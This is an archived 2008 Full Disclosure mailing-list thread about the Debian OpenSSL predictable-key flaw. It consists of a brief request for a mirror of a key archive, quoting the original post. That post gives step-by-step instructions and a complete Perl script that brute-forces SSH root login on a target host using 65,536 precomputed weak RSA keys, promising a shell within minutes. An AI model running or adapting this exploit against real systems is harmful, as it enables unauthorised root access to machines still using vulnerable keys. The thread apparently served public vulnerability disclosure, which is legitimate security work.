Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Full Disclosure: Re: Working exploit for Debian generated SSH Keys

Re: Working exploit for Debian generated SSH Keys

From: bob harley <bobb.harley_at_gmail.com>
Date: Sun, 18 May 2008 11:13:48 -0400

Anyone have a copy of
rsa.2048.tar.bzip2<http://www.deadbeef.de/rsa.2048.tar.bzip2>?
The web server isn't playing nicely ;-)

On Thu, May 15, 2008 at 2:35 AM, Markus Müller <mm_at_deadbeef.de> wrote:

> Hi full-disclosure,
>
> the debian openssl issue leads that there are only 65.536 possible ssh
> keys generated, cause the only entropy is the pid of the process
> generating the key.
>
> This leads to that the following perl script can be used with the
> precalculated ssh keys to brute force the ssh login. It works if such a
> keys is installed on a non-patched debian or any other system manual
> configured to.
>
> On an unpatched system, which doesn't need to be debian, do the following:
>
> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>
> 2. Extract it to a directory
>
> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
> Bits, generated on an upatched debian (this is the key this exploit will
> break)
>
> 4. Run the perl script and give it the location to where you extracted
> the bzip2 mentioned.
>
> #!/usr/bin/perl
> my $keysPerConnect = 6;
> unless ($ARGV[1]) {
> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
> print "By mm_at_deadbeef.de\n";
> exit 0;
> }
> chdir($ARGV[0]);
> opendir(A, $ARGV[0]) || die("opendir");
> while ($_ = readdir(A)) {
> chomp;
> next unless m,^\d+$,;
> push(@a, $_);
> if (scalar(@a) > $keysPerConnect) {
> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
> ".$_ } @a)." ".$ARGV[1]);
> @a = ();
> }
> }
>
> 5. Enjoy the shell after some minutes (less than 20 minutes)
>
> Regards,
> Markus Mueller
> mm_at_deadbeef.de
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on May 18 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]